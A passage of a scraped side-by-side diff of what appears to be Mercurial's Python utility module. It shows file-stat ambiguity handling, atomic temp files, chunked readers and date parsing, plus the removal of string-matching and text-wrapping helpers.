1937 | inst.filename = name |
|
|||
1938 | raise |
|
|||
1939 | ofp = posixfile(temp, "wb") |
|
|||
1940 | for chunk in filechunkiter(ifp): |
|
|||
1941 | ofp.write(chunk) |
|
|||
1942 | ifp.close() |
|
|||
1943 | ofp.close() |
|
|||
1944 | except: # re-raises |
|
|||
1945 | try: |
|
|||
1946 | os.unlink(temp) |
|
|||
1947 | except OSError: |
|
|||
1948 | pass |
|
|||
1949 | raise |
|
|||
1950 | return temp |
|
|||
1951 |
|
||||
1952 | class filestat(object): |
|
|||
1953 | """help to exactly detect change of a file |
|
|||
1954 |
|
||||
1955 | 'stat' attribute is result of 'os.stat()' if specified 'path' |
|
|||
1956 | exists. Otherwise, it is None. This can avoid preparative |
|
|||
1957 | 'exists()' examination on client side of this class. |
|
|||
1958 | """ |
|
|||
1959 | def __init__(self, stat): |
|
|||
1960 | self.stat = stat |
|
|||
1961 |
|
||||
1962 | @classmethod |
|
|||
1963 | def frompath(cls, path): |
|
|||
1964 | try: |
|
|||
1965 | stat = os.stat(path) |
|
|||
1966 | except OSError as err: |
|
|||
1967 | if err.errno != errno.ENOENT: |
|
|||
1968 | raise |
|
|||
1969 | stat = None |
|
|||
1970 | return cls(stat) |
|
|||
1971 |
|
||||
1972 | @classmethod |
|
|||
1973 | def fromfp(cls, fp): |
|
|||
1974 | stat = os.fstat(fp.fileno()) |
|
|||
1975 | return cls(stat) |
|
|||
1976 |
|
||||
1977 | __hash__ = object.__hash__ |
|
|||
1978 |
|
||||
1979 | def __eq__(self, old): |
|
|||
1980 | try: |
|
|||
1981 | # if ambiguity between stat of new and old file is |
|
|||
1982 | # avoided, comparison of size, ctime and mtime is enough |
|
|||
1983 | # to exactly detect change of a file regardless of platform |
|
|||
1984 | return (self.stat.st_size == old.stat.st_size and |
|
|||
1985 | self.stat.st_ctime == old.stat.st_ctime and |
|
|||
1986 | self.stat.st_mtime == old.stat.st_mtime) |
|
|||
1987 | except AttributeError: |
|
|||
1988 | pass |
|
|||
1989 | try: |
|
|||
1990 | return self.stat is None and old.stat is None |
|
|||
1991 | except AttributeError: |
|
|||
1992 | return False |
|
|||
1993 |
|
||||
1994 | def isambig(self, old): |
|
|||
1995 | """Examine whether new (= self) stat is ambiguous against old one |
|
|||
1996 |
|
||||
1997 | "S[N]" below means stat of a file at N-th change: |
|
|||
1998 |
|
||||
1999 | - S[n-1].ctime < S[n].ctime: can detect change of a file |
|
|||
2000 | - S[n-1].ctime == S[n].ctime |
|
|||
2001 | - S[n-1].ctime < S[n].mtime: means natural advancing (*1) |
|
|||
2002 | - S[n-1].ctime == S[n].mtime: is ambiguous (*2) |
|
|||
2003 | - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care) |
|
|||
2004 | - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care) |
|
|||
2005 |
|
||||
2006 | Case (*2) above means that a file was changed twice or more at |
|
|||
2007 | same time in sec (= S[n-1].ctime), and comparison of timestamp |
|
|||
2008 | is ambiguous. |
|
|||
2009 |
|
||||
2010 | Base idea to avoid such ambiguity is "advance mtime 1 sec, if |
|
|||
2011 | timestamp is ambiguous". |
|
|||
2012 |
|
||||
2013 | But advancing mtime only in case (*2) doesn't work as |
|
|||
2014 | expected, because naturally advanced S[n].mtime in case (*1) |
|
|||
2015 | might be equal to manually advanced S[n-1 or earlier].mtime. |
|
|||
2016 |
|
||||
2017 | Therefore, all "S[n-1].ctime == S[n].ctime" cases should be |
|
|||
2018 | treated as ambiguous regardless of mtime, to avoid overlooking |
|
|||
2019 | by confliction between such mtime. |
|
|||
2020 |
|
||||
2021 | Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime != |
|
|||
2022 | S[n].mtime", even if size of a file isn't changed. |
|
|||
2023 | """ |
|
|||
2024 | try: |
|
|||
2025 | return (self.stat.st_ctime == old.stat.st_ctime) |
|
|||
2026 | except AttributeError: |
|
|||
2027 | return False |
|
|||
2028 |
|
||||
2029 | def avoidambig(self, path, old): |
|
|||
2030 | """Change file stat of specified path to avoid ambiguity |
|
|||
2031 |
|
||||
2032 | 'old' should be previous filestat of 'path'. |
|
|||
2033 |
|
||||
2034 | This skips avoiding ambiguity, if a process doesn't have |
|
|||
2035 | appropriate privileges for 'path'. This returns False in this |
|
|||
2036 | case. |
|
|||
2037 |
|
||||
2038 | Otherwise, this returns True, as "ambiguity is avoided". |
|
|||
2039 | """ |
|
|||
2040 | advanced = (old.stat.st_mtime + 1) & 0x7fffffff |
|
|||
2041 | try: |
|
|||
2042 | os.utime(path, (advanced, advanced)) |
|
|||
2043 | except OSError as inst: |
|
|||
2044 | if inst.errno == errno.EPERM: |
|
|||
2045 | # utime() on the file created by another user causes EPERM, |
|
|||
2046 | # if a process doesn't have appropriate privileges |
|
|||
2047 | return False |
|
|||
2048 | raise |
|
|||
2049 | return True |
|
|||
2050 |
|
||||
2051 | def __ne__(self, other): |
|
|||
2052 | return not self == other |
|
|||
2053 |
|
||||
2054 | class atomictempfile(object): |
|
|||
2055 | '''writable file object that atomically updates a file |
|
|||
2056 |
|
||||
2057 | All writes will go to a temporary copy of the original file. Call |
|
|||
2058 | close() when you are done writing, and atomictempfile will rename |
|
|||
2059 | the temporary copy to the original name, making the changes |
|
|||
2060 | visible. If the object is destroyed without being closed, all your |
|
|||
2061 | writes are discarded. |
|
|||
2062 |
|
||||
2063 | checkambig argument of constructor is used with filestat, and is |
|
|||
2064 | useful only if target file is guarded by any lock (e.g. repo.lock |
|
|||
2065 | or repo.wlock). |
|
|||
2066 | ''' |
|
|||
2067 | def __init__(self, name, mode='w+b', createmode=None, checkambig=False): |
|
|||
2068 | self.__name = name # permanent name |
|
|||
2069 | self._tempname = mktempcopy(name, emptyok=('w' in mode), |
|
|||
2070 | createmode=createmode) |
|
|||
2071 | self._fp = posixfile(self._tempname, mode) |
|
|||
2072 | self._checkambig = checkambig |
|
|||
2073 |
|
||||
2074 | # delegated methods |
|
|||
2075 | self.read = self._fp.read |
|
|||
2076 | self.write = self._fp.write |
|
|||
2077 | self.seek = self._fp.seek |
|
|||
2078 | self.tell = self._fp.tell |
|
|||
2079 | self.fileno = self._fp.fileno |
|
|||
2080 |
|
||||
2081 | def close(self): |
|
|||
2082 | if not self._fp.closed: |
|
|||
2083 | self._fp.close() |
|
|||
2084 | filename = localpath(self.__name) |
|
|||
2085 | oldstat = self._checkambig and filestat.frompath(filename) |
|
|||
2086 | if oldstat and oldstat.stat: |
|
|||
2087 | rename(self._tempname, filename) |
|
|||
2088 | newstat = filestat.frompath(filename) |
|
|||
2089 | if newstat.isambig(oldstat): |
|
|||
2090 | # stat of changed file is ambiguous to original one |
|
|||
2091 | advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff |
|
|||
2092 | os.utime(filename, (advanced, advanced)) |
|
|||
2093 | else: |
|
|||
2094 | rename(self._tempname, filename) |
|
|||
2095 |
|
||||
2096 | def discard(self): |
|
|||
2097 | if not self._fp.closed: |
|
|||
2098 | try: |
|
|||
2099 | os.unlink(self._tempname) |
|
|||
2100 | except OSError: |
|
|||
2101 | pass |
|
|||
2102 | self._fp.close() |
|
|||
2103 |
|
||||
2104 | def __del__(self): |
|
|||
2105 | if safehasattr(self, '_fp'): # constructor actually did something |
|
|||
2106 | self.discard() |
|
|||
2107 |
|
||||
2108 | def __enter__(self): |
|
|||
2109 | return self |
|
|||
2110 |
|
||||
2111 | def __exit__(self, exctype, excvalue, traceback): |
|
|||
2112 | if exctype is not None: |
|
|||
2113 | self.discard() |
|
|||
2114 | else: |
|
|||
2115 | self.close() |
|
|||
2116 |
|
||||
2117 | def unlinkpath(f, ignoremissing=False): |
|
|||
2118 | """unlink and remove the directory if it is empty""" |
|
|||
2119 | if ignoremissing: |
|
|||
2120 | tryunlink(f) |
|
|||
2121 | else: |
|
|||
2122 | unlink(f) |
|
|||
2123 | # try removing directories that might now be empty |
|
|||
2124 | try: |
|
|||
2125 | removedirs(os.path.dirname(f)) |
|
|||
2126 | except OSError: |
|
|||
2127 | pass |
|
|||
2128 |
|
||||
2129 | def tryunlink(f): |
|
|||
2130 | """Attempt to remove a file, ignoring ENOENT errors.""" |
|
|||
2131 | try: |
|
|||
2132 | unlink(f) |
|
|||
2133 | except OSError as e: |
|
|||
2134 | if e.errno != errno.ENOENT: |
|
|||
2135 | raise |
|
|||
2136 |
|
||||
2137 | def makedirs(name, mode=None, notindexed=False): |
|
|||
2138 | """recursive directory creation with parent mode inheritance |
|
|||
2139 |
|
||||
2140 | Newly created directories are marked as "not to be indexed by |
|
|||
2141 | the content indexing service", if ``notindexed`` is specified |
|
|||
2142 | for "write" mode access. |
|
|||
2143 | """ |
|
|||
2144 | try: |
|
|||
2145 | makedir(name, notindexed) |
|
|||
2146 | except OSError as err: |
|
|||
2147 | if err.errno == errno.EEXIST: |
|
|||
2148 | return |
|
|||
2149 | if err.errno != errno.ENOENT or not name: |
|
|||
2150 | raise |
|
|||
2151 | parent = os.path.dirname(os.path.abspath(name)) |
|
|||
2152 | if parent == name: |
|
|||
2153 | raise |
|
|||
2154 | makedirs(parent, mode, notindexed) |
|
|||
2155 | try: |
|
|||
2156 | makedir(name, notindexed) |
|
|||
2157 | except OSError as err: |
|
|||
2158 | # Catch EEXIST to handle races |
|
|||
2159 | if err.errno == errno.EEXIST: |
|
|||
2160 | return |
|
|||
2161 | raise |
|
|||
2162 | if mode is not None: |
|
|||
2163 | os.chmod(name, mode) |
|
|||
2164 |
|
||||
2165 | def readfile(path): |
|
|||
2166 | with open(path, 'rb') as fp: |
|
|||
2167 | return fp.read() |
|
|||
2168 |
|
||||
2169 | def writefile(path, text): |
|
|||
2170 | with open(path, 'wb') as fp: |
|
|||
2171 | fp.write(text) |
|
|||
2172 |
|
||||
2173 | def appendfile(path, text): |
|
|||
2174 | with open(path, 'ab') as fp: |
|
|||
2175 | fp.write(text) |
|
|||
2176 |
|
||||
2177 | class chunkbuffer(object): |
|
|||
2178 | """Allow arbitrary sized chunks of data to be efficiently read from an |
|
|||
2179 | iterator over chunks of arbitrary size.""" |
|
|||
2180 |
|
||||
2181 | def __init__(self, in_iter): |
|
|||
2182 | """in_iter is the iterator that's iterating over the input chunks.""" |
|
|||
2183 | def splitbig(chunks): |
|
|||
2184 | for chunk in chunks: |
|
|||
2185 | if len(chunk) > 2**20: |
|
|||
2186 | pos = 0 |
|
|||
2187 | while pos < len(chunk): |
|
|||
2188 | end = pos + 2 ** 18 |
|
|||
2189 | yield chunk[pos:end] |
|
|||
2190 | pos = end |
|
|||
2191 | else: |
|
|||
2192 | yield chunk |
|
|||
2193 | self.iter = splitbig(in_iter) |
|
|||
2194 | self._queue = collections.deque() |
|
|||
2195 | self._chunkoffset = 0 |
|
|||
2196 |
|
||||
2197 | def read(self, l=None): |
|
|||
2198 | """Read L bytes of data from the iterator of chunks of data. |
|
|||
2199 | Returns less than L bytes if the iterator runs dry. |
|
|||
2200 |
|
||||
2201 | If size parameter is omitted, read everything""" |
|
|||
2202 | if l is None: |
|
|||
2203 | return ''.join(self.iter) |
|
|||
2204 |
|
||||
2205 | left = l |
|
|||
2206 | buf = [] |
|
|||
2207 | queue = self._queue |
|
|||
2208 | while left > 0: |
|
|||
2209 | # refill the queue |
|
|||
2210 | if not queue: |
|
|||
2211 | target = 2**18 |
|
|||
2212 | for chunk in self.iter: |
|
|||
2213 | queue.append(chunk) |
|
|||
2214 | target -= len(chunk) |
|
|||
2215 | if target <= 0: |
|
|||
2216 | break |
|
|||
2217 | if not queue: |
|
|||
2218 | break |
|
|||
2219 |
|
||||
2220 | # The easy way to do this would be to queue.popleft(), modify the |
|
|||
2221 | # chunk (if necessary), then queue.appendleft(). However, for cases |
|
|||
2222 | # where we read partial chunk content, this incurs 2 dequeue |
|
|||
2223 | # mutations and creates a new str for the remaining chunk in the |
|
|||
2224 | # queue. Our code below avoids this overhead. |
|
|||
2225 |
|
||||
2226 | chunk = queue[0] |
|
|||
2227 | chunkl = len(chunk) |
|
|||
2228 | offset = self._chunkoffset |
|
|||
2229 |
|
||||
2230 | # Use full chunk. |
|
|||
2231 | if offset == 0 and left >= chunkl: |
|
|||
2232 | left -= chunkl |
|
|||
2233 | queue.popleft() |
|
|||
2234 | buf.append(chunk) |
|
|||
2235 | # self._chunkoffset remains at 0. |
|
|||
2236 | continue |
|
|||
2237 |
|
||||
2238 | chunkremaining = chunkl - offset |
|
|||
2239 |
|
||||
2240 | # Use all of unconsumed part of chunk. |
|
|||
2241 | if left >= chunkremaining: |
|
|||
2242 | left -= chunkremaining |
|
|||
2243 | queue.popleft() |
|
|||
2244 | # offset == 0 is enabled by block above, so this won't merely |
|
|||
2245 | # copy via ``chunk[0:]``. |
|
|||
2246 | buf.append(chunk[offset:]) |
|
|||
2247 | self._chunkoffset = 0 |
|
|||
2248 |
|
||||
2249 | # Partial chunk needed. |
|
|||
2250 | else: |
|
|||
2251 | buf.append(chunk[offset:offset + left]) |
|
|||
2252 | self._chunkoffset += left |
|
|||
2253 | left -= chunkremaining |
|
|||
2254 |
|
||||
2255 | return ''.join(buf) |
|
|||
2256 |
|
||||
2257 | def filechunkiter(f, size=131072, limit=None): |
|
|||
2258 | """Create a generator that produces the data in the file size |
|
|||
2259 | (default 131072) bytes at a time, up to optional limit (default is |
|
|||
2260 | to read all data). Chunks may be less than size bytes if the |
|
|||
2261 | chunk is the last chunk in the file, or the file is a socket or |
|
|||
2262 | some other type of file that sometimes reads less data than is |
|
|||
2263 | requested.""" |
|
|||
2264 | assert size >= 0 |
|
|||
2265 | assert limit is None or limit >= 0 |
|
|||
2266 | while True: |
|
|||
2267 | if limit is None: |
|
|||
2268 | nbytes = size |
|
|||
2269 | else: |
|
|||
2270 | nbytes = min(limit, size) |
|
|||
2271 | s = nbytes and f.read(nbytes) |
|
|||
2272 | if not s: |
|
|||
2273 | break |
|
|||
2274 | if limit: |
|
|||
2275 | limit -= len(s) |
|
|||
2276 | yield s |
|
|||
2277 |
|
||||
2278 | class cappedreader(object): |
|
|||
2279 | """A file object proxy that allows reading up to N bytes. |
|
|||
2280 |
|
||||
2281 | Given a source file object, instances of this type allow reading up to |
|
|||
2282 | N bytes from that source file object. Attempts to read past the allowed |
|
|||
2283 | limit are treated as EOF. |
|
|||
2284 |
|
||||
2285 | It is assumed that I/O is not performed on the original file object |
|
|||
2286 | in addition to I/O that is performed by this instance. If there is, |
|
|||
2287 | state tracking will get out of sync and unexpected results will ensue. |
|
|||
2288 | """ |
|
|||
2289 | def __init__(self, fh, limit): |
|
|||
2290 | """Allow reading up to <limit> bytes from <fh>.""" |
|
|||
2291 | self._fh = fh |
|
|||
2292 | self._left = limit |
|
|||
2293 |
|
||||
2294 | def read(self, n=-1): |
|
|||
2295 | if not self._left: |
|
|||
2296 | return b'' |
|
|||
2297 |
|
||||
2298 | if n < 0: |
|
|||
2299 | n = self._left |
|
|||
2300 |
|
||||
2301 | data = self._fh.read(min(n, self._left)) |
|
|||
2302 | self._left -= len(data) |
|
|||
2303 | assert self._left >= 0 |
|
|||
2304 |
|
||||
2305 | return data |
|
|||
2306 |
|
||||
2307 | def makedate(timestamp=None): |
|
63 | def makedate(timestamp=None): | |
2308 | '''Return a unix timestamp (or the current time) as a (unixtime, |
|
64 | '''Return a unix timestamp (or the current time) as a (unixtime, | |
2309 | offset) tuple based off the local timezone.''' |
|
65 | offset) tuple based off the local timezone.''' | |
@@ -2311,7 +67,7 b' def makedate(timestamp=None):' | |||||
2311 | timestamp = time.time() |
|
67 | timestamp = time.time() | |
2312 | if timestamp < 0: |
|
68 | if timestamp < 0: | |
2313 | hint = _("check your clock") |
|
69 | hint = _("check your clock") | |
2314 | raise Abort(_("negative timestamp: %d") % timestamp, hint=hint) |
|
70 | raise error.Abort(_("negative timestamp: %d") % timestamp, hint=hint) | |
2315 | delta = (datetime.datetime.utcfromtimestamp(timestamp) - |
|
71 | delta = (datetime.datetime.utcfromtimestamp(timestamp) - | |
2316 | datetime.datetime.fromtimestamp(timestamp)) |
|
72 | datetime.datetime.fromtimestamp(timestamp)) | |
2317 | tz = delta.days * 86400 + delta.seconds |
|
73 | tz = delta.days * 86400 + delta.seconds | |
@@ -2546,24 +302,24 b' def matchdate(date):' | |||||
2546 | date = date.strip() |
|
302 | date = date.strip() | |
2547 |
|
303 | |||
2548 | if not date: |
|
304 | if not date: | |
2549 | raise Abort(_("dates cannot consist entirely of whitespace")) |
|
305 | raise error.Abort(_("dates cannot consist entirely of whitespace")) | |
2550 | elif date[0] == "<": |
|
306 | elif date[0] == "<": | |
2551 | if not date[1:]: |
|
307 | if not date[1:]: | |
2552 | raise Abort(_("invalid day spec, use '<DATE'")) |
|
308 | raise error.Abort(_("invalid day spec, use '<DATE'")) | |
2553 | when = upper(date[1:]) |
|
309 | when = upper(date[1:]) | |
2554 | return lambda x: x <= when |
|
310 | return lambda x: x <= when | |
2555 | elif date[0] == ">": |
|
311 | elif date[0] == ">": | |
2556 | if not date[1:]: |
|
312 | if not date[1:]: | |
2557 | raise Abort(_("invalid day spec, use '>DATE'")) |
|
313 | raise error.Abort(_("invalid day spec, use '>DATE'")) | |
2558 | when = lower(date[1:]) |
|
314 | when = lower(date[1:]) | |
2559 | return lambda x: x >= when |
|
315 | return lambda x: x >= when | |
2560 | elif date[0] == "-": |
|
316 | elif date[0] == "-": | |
2561 | try: |
|
317 | try: | |
2562 | days = int(date[1:]) |
|
318 | days = int(date[1:]) | |
2563 | except ValueError: |
|
319 | except ValueError: | |
2564 | raise Abort(_("invalid day spec: %s") % date[1:]) |
|
320 | raise error.Abort(_("invalid day spec: %s") % date[1:]) | |
2565 | if days < 0: |
|
321 | if days < 0: | |
2566 | raise Abort(_("%s must be nonnegative (see 'hg help dates')") |
|
322 | raise error.Abort(_("%s must be nonnegative (see 'hg help dates')") | |
2567 | % date[1:]) |
|
323 | % date[1:]) | |
2568 | when = makedate()[0] - days * 3600 * 24 |
|
324 | when = makedate()[0] - days * 3600 * 24 | |
2569 | return lambda x: x >= when |
|
325 | return lambda x: x >= when | |
@@ -2574,1732 +330,3 b' def matchdate(date):' | |||||
2574 | else: |
|
330 | else: | |
2575 | start, stop = lower(date), upper(date) |
|
331 | start, stop = lower(date), upper(date) | |
2576 | return lambda x: x >= start and x <= stop |
|
332 | return lambda x: x >= start and x <= stop | |
2577 |
|
||||
2578 | def stringmatcher(pattern, casesensitive=True): |
|
|||
2579 | """ |
|
|||
2580 | accepts a string, possibly starting with 're:' or 'literal:' prefix. |
|
|||
2581 | returns the matcher name, pattern, and matcher function. |
|
|||
2582 | missing or unknown prefixes are treated as literal matches. |
|
|||
2583 |
|
||||
2584 | helper for tests: |
|
|||
2585 | >>> def test(pattern, *tests): |
|
|||
2586 | ... kind, pattern, matcher = stringmatcher(pattern) |
|
|||
2587 | ... return (kind, pattern, [bool(matcher(t)) for t in tests]) |
|
|||
2588 | >>> def itest(pattern, *tests): |
|
|||
2589 | ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False) |
|
|||
2590 | ... return (kind, pattern, [bool(matcher(t)) for t in tests]) |
|
|||
2591 |
|
||||
2592 | exact matching (no prefix): |
|
|||
2593 | >>> test(b'abcdefg', b'abc', b'def', b'abcdefg') |
|
|||
2594 | ('literal', 'abcdefg', [False, False, True]) |
|
|||
2595 |
|
||||
2596 | regex matching ('re:' prefix) |
|
|||
2597 | >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar') |
|
|||
2598 | ('re', 'a.+b', [False, False, True]) |
|
|||
2599 |
|
||||
2600 | force exact matches ('literal:' prefix) |
|
|||
2601 | >>> test(b'literal:re:foobar', b'foobar', b're:foobar') |
|
|||
2602 | ('literal', 're:foobar', [False, True]) |
|
|||
2603 |
|
||||
2604 | unknown prefixes are ignored and treated as literals |
|
|||
2605 | >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar') |
|
|||
2606 | ('literal', 'foo:bar', [False, False, True]) |
|
|||
2607 |
|
||||
2608 | case insensitive regex matches |
|
|||
2609 | >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar') |
|
|||
2610 | ('re', 'A.+b', [False, False, True]) |
|
|||
2611 |
|
||||
2612 | case insensitive literal matches |
|
|||
2613 | >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg') |
|
|||
2614 | ('literal', 'ABCDEFG', [False, False, True]) |
|
|||
2615 | """ |
|
|||
2616 | if pattern.startswith('re:'): |
|
|||
2617 | pattern = pattern[3:] |
|
|||
2618 | try: |
|
|||
2619 | flags = 0 |
|
|||
2620 | if not casesensitive: |
|
|||
2621 | flags = remod.I |
|
|||
2622 | regex = remod.compile(pattern, flags) |
|
|||
2623 | except remod.error as e: |
|
|||
2624 | raise error.ParseError(_('invalid regular expression: %s') |
|
|||
2625 | % e) |
|
|||
2626 | return 're', pattern, regex.search |
|
|||
2627 | elif pattern.startswith('literal:'): |
|
|||
2628 | pattern = pattern[8:] |
|
|||
2629 |
|
||||
2630 | match = pattern.__eq__ |
|
|||
2631 |
|
||||
2632 | if not casesensitive: |
|
|||
2633 | ipat = encoding.lower(pattern) |
|
|||
2634 | match = lambda s: ipat == encoding.lower(s) |
|
|||
2635 | return 'literal', pattern, match |
|
|||
2636 |
|
||||
2637 | def shortuser(user): |
|
|||
2638 | """Return a short representation of a user name or email address.""" |
|
|||
2639 | f = user.find('@') |
|
|||
2640 | if f >= 0: |
|
|||
2641 | user = user[:f] |
|
|||
2642 | f = user.find('<') |
|
|||
2643 | if f >= 0: |
|
|||
2644 | user = user[f + 1:] |
|
|||
2645 | f = user.find(' ') |
|
|||
2646 | if f >= 0: |
|
|||
2647 | user = user[:f] |
|
|||
2648 | f = user.find('.') |
|
|||
2649 | if f >= 0: |
|
|||
2650 | user = user[:f] |
|
|||
2651 | return user |
|
|||
2652 |
|
||||
2653 | def emailuser(user): |
|
|||
2654 | """Return the user portion of an email address.""" |
|
|||
2655 | f = user.find('@') |
|
|||
2656 | if f >= 0: |
|
|||
2657 | user = user[:f] |
|
|||
2658 | f = user.find('<') |
|
|||
2659 | if f >= 0: |
|
|||
2660 | user = user[f + 1:] |
|
|||
2661 | return user |
|
|||
2662 |
|
||||
2663 | def email(author): |
|
|||
2664 | '''get email of author.''' |
|
|||
2665 | r = author.find('>') |
|
|||
2666 | if r == -1: |
|
|||
2667 | r = None |
|
|||
2668 | return author[author.find('<') + 1:r] |
|
|||
2669 |
|
||||
2670 | def ellipsis(text, maxlength=400): |
|
|||
2671 | """Trim string to at most maxlength (default: 400) columns in display.""" |
|
|||
2672 | return encoding.trim(text, maxlength, ellipsis='...') |
|
|||
2673 |
|
||||
2674 | def unitcountfn(*unittable): |
|
|||
2675 | '''return a function that renders a readable count of some quantity''' |
|
|||
2676 |
|
||||
2677 | def go(count): |
|
|||
2678 | for multiplier, divisor, format in unittable: |
|
|||
2679 | if abs(count) >= divisor * multiplier: |
|
|||
2680 | return format % (count / float(divisor)) |
|
|||
2681 | return unittable[-1][2] % count |
|
|||
2682 |
|
||||
2683 | return go |
|
|||
2684 |
|
||||
2685 | def processlinerange(fromline, toline): |
|
|||
2686 | """Check that linerange <fromline>:<toline> makes sense and return a |
|
|||
2687 | 0-based range. |
|
|||
2688 |
|
||||
2689 | >>> processlinerange(10, 20) |
|
|||
2690 | (9, 20) |
|
|||
2691 | >>> processlinerange(2, 1) |
|
|||
2692 | Traceback (most recent call last): |
|
|||
2693 | ... |
|
|||
2694 | ParseError: line range must be positive |
|
|||
2695 | >>> processlinerange(0, 5) |
|
|||
2696 | Traceback (most recent call last): |
|
|||
2697 | ... |
|
|||
2698 | ParseError: fromline must be strictly positive |
|
|||
2699 | """ |
|
|||
2700 | if toline - fromline < 0: |
|
|||
2701 | raise error.ParseError(_("line range must be positive")) |
|
|||
2702 | if fromline < 1: |
|
|||
2703 | raise error.ParseError(_("fromline must be strictly positive")) |
|
|||
2704 | return fromline - 1, toline |
|
|||
2705 |
|
||||
2706 | bytecount = unitcountfn( |
|
|||
2707 | (100, 1 << 30, _('%.0f GB')), |
|
|||
2708 | (10, 1 << 30, _('%.1f GB')), |
|
|||
2709 | (1, 1 << 30, _('%.2f GB')), |
|
|||
2710 | (100, 1 << 20, _('%.0f MB')), |
|
|||
2711 | (10, 1 << 20, _('%.1f MB')), |
|
|||
2712 | (1, 1 << 20, _('%.2f MB')), |
|
|||
2713 | (100, 1 << 10, _('%.0f KB')), |
|
|||
2714 | (10, 1 << 10, _('%.1f KB')), |
|
|||
2715 | (1, 1 << 10, _('%.2f KB')), |
|
|||
2716 | (1, 1, _('%.0f bytes')), |
|
|||
2717 | ) |
|
|||
2718 |
|
||||
2719 | # Matches a single EOL which can either be a CRLF where repeated CR |
|
|||
2720 | # are removed or a LF. We do not care about old Macintosh files, so a |
|
|||
2721 | # stray CR is an error. |
|
|||
2722 | _eolre = remod.compile(br'\r*\n') |
|
|||
2723 |
|
||||
2724 | def tolf(s): |
|
|||
2725 | return _eolre.sub('\n', s) |
|
|||
2726 |
|
||||
2727 | def tocrlf(s): |
|
|||
2728 | return _eolre.sub('\r\n', s) |
|
|||
2729 |
|
||||
2730 | if pycompat.oslinesep == '\r\n': |
|
|||
2731 | tonativeeol = tocrlf |
|
|||
2732 | fromnativeeol = tolf |
|
|||
2733 | else: |
|
|||
2734 | tonativeeol = pycompat.identity |
|
|||
2735 | fromnativeeol = pycompat.identity |
|
|||
2736 |
|
||||
2737 | def escapestr(s): |
|
|||
2738 | # call underlying function of s.encode('string_escape') directly for |
|
|||
2739 | # Python 3 compatibility |
|
|||
2740 | return codecs.escape_encode(s)[0] |
|
|||
2741 |
|
||||
2742 | def unescapestr(s): |
|
|||
2743 | return codecs.escape_decode(s)[0] |
|
|||
2744 |
|
||||
2745 | def forcebytestr(obj): |
|
|||
2746 | """Portably format an arbitrary object (e.g. exception) into a byte |
|
|||
2747 | string.""" |
|
|||
2748 | try: |
|
|||
2749 | return pycompat.bytestr(obj) |
|
|||
2750 | except UnicodeEncodeError: |
|
|||
2751 | # non-ascii string, may be lossy |
|
|||
2752 | return pycompat.bytestr(encoding.strtolocal(str(obj))) |
|
|||
2753 |
|
||||
2754 | def uirepr(s): |
|
|||
2755 | # Avoid double backslash in Windows path repr() |
|
|||
2756 | return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\') |
|
|||
2757 |
|
||||
2758 | # delay import of textwrap |
|
|||
2759 | def MBTextWrapper(**kwargs): |
|
|||
2760 | class tw(textwrap.TextWrapper): |
|
|||
2761 | """ |
|
|||
2762 | Extend TextWrapper for width-awareness. |
|
|||
2763 |
|
||||
2764 | Neither number of 'bytes' in any encoding nor 'characters' is |
|
|||
2765 | appropriate to calculate terminal columns for specified string. |
|
|||
2766 |
|
||||
2767 | Original TextWrapper implementation uses built-in 'len()' directly, |
|
|||
2768 | so overriding is needed to use width information of each characters. |
|
|||
2769 |
|
||||
2770 | In addition, characters classified into 'ambiguous' width are |
|
|||
2771 | treated as wide in East Asian area, but as narrow in other. |
|
|||
2772 |
|
||||
2773 | This requires use decision to determine width of such characters. |
|
|||
2774 | """ |
|
|||
2775 | def _cutdown(self, ucstr, space_left): |
|
|||
2776 | l = 0 |
|
|||
2777 | colwidth = encoding.ucolwidth |
|
|||
2778 | for i in xrange(len(ucstr)): |
|
|||
2779 | l += colwidth(ucstr[i]) |
|
|||
2780 | if space_left < l: |
|
|||
2781 | return (ucstr[:i], ucstr[i:]) |
|
|||
2782 | return ucstr, '' |
|
|||
2783 |
|
||||
2784 | # overriding of base class |
|
|||
2785 | def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width): |
|
|||
2786 | space_left = max(width - cur_len, 1) |
|
|||
2787 |
|
||||
2788 | if self.break_long_words: |
|
|||
2789 | cut, res = self._cutdown(reversed_chunks[-1], space_left) |
|
|||
2790 | cur_line.append(cut) |
|
|||
2791 | reversed_chunks[-1] = res |
|
|||
2792 | elif not cur_line: |
|
|||
2793 | cur_line.append(reversed_chunks.pop()) |
|
|||
2794 |
|
||||
2795 | # this overriding code is imported from TextWrapper of Python 2.6 |
|
|||
2796 | # to calculate columns of string by 'encoding.ucolwidth()' |
|
|||
2797 | def _wrap_chunks(self, chunks): |
|
|||
2798 | colwidth = encoding.ucolwidth |
|
|||
2799 |
|
||||
2800 | lines = [] |
|
|||
2801 | if self.width <= 0: |
|
|||
2802 | raise ValueError("invalid width %r (must be > 0)" % self.width) |
|
|||
2803 |
|
||||
2804 | # Arrange in reverse order so items can be efficiently popped |
|
|||
2805 | # from a stack of chucks. |
|
|||
2806 | chunks.reverse() |
|
|||
2807 |
|
||||
2808 | while chunks: |
|
|||
2809 |
|
||||
2810 | # Start the list of chunks that will make up the current line. |
|
|||
2811 | # cur_len is just the length of all the chunks in cur_line. |
|
|||
2812 | cur_line = [] |
|
|||
2813 | cur_len = 0 |
|
|||
2814 |
|
||||
2815 | # Figure out which static string will prefix this line. |
|
|||
2816 | if lines: |
|
|||
2817 | indent = self.subsequent_indent |
|
|||
2818 | else: |
|
|||
2819 | indent = self.initial_indent |
|
|||
2820 |
|
||||
2821 | # Maximum width for this line. |
|
|||
2822 | width = self.width - len(indent) |
|
|||
2823 |
|
||||
2824 | # First chunk on line is whitespace -- drop it, unless this |
|
|||
2825 | # is the very beginning of the text (i.e. no lines started yet). |
|
|||
2826 | if self.drop_whitespace and chunks[-1].strip() == r'' and lines: |
|
|||
2827 | del chunks[-1] |
|
|||
2828 |
|
||||
2829 | while chunks: |
|
|||
2830 | l = colwidth(chunks[-1]) |
|
|||
2831 |
|
||||
2832 | # Can at least squeeze this chunk onto the current line. |
|
|||
2833 | if cur_len + l <= width: |
|
|||
2834 | cur_line.append(chunks.pop()) |
|
|||
2835 | cur_len += l |
